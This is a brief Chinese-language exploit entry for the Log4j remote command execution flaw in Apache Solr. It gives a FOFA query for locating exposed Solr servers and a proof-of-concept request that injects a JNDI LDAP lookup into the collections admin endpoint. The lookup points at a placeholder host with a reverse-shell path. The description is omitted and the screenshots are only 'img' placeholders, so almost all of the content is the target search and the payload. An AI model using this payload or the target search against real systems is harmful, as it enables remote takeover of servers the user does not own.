Apache Solr Log4j组件 远程命令执行漏洞

漏洞描述

Apache Solr Log4j组件 远程命令执行漏洞,详情略

漏洞影响

Apache Solr

网络测绘

FOFA: app="APACHE-Solr"

漏洞复现

登录页面

img

验证POC

/solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/87}&wt=json

img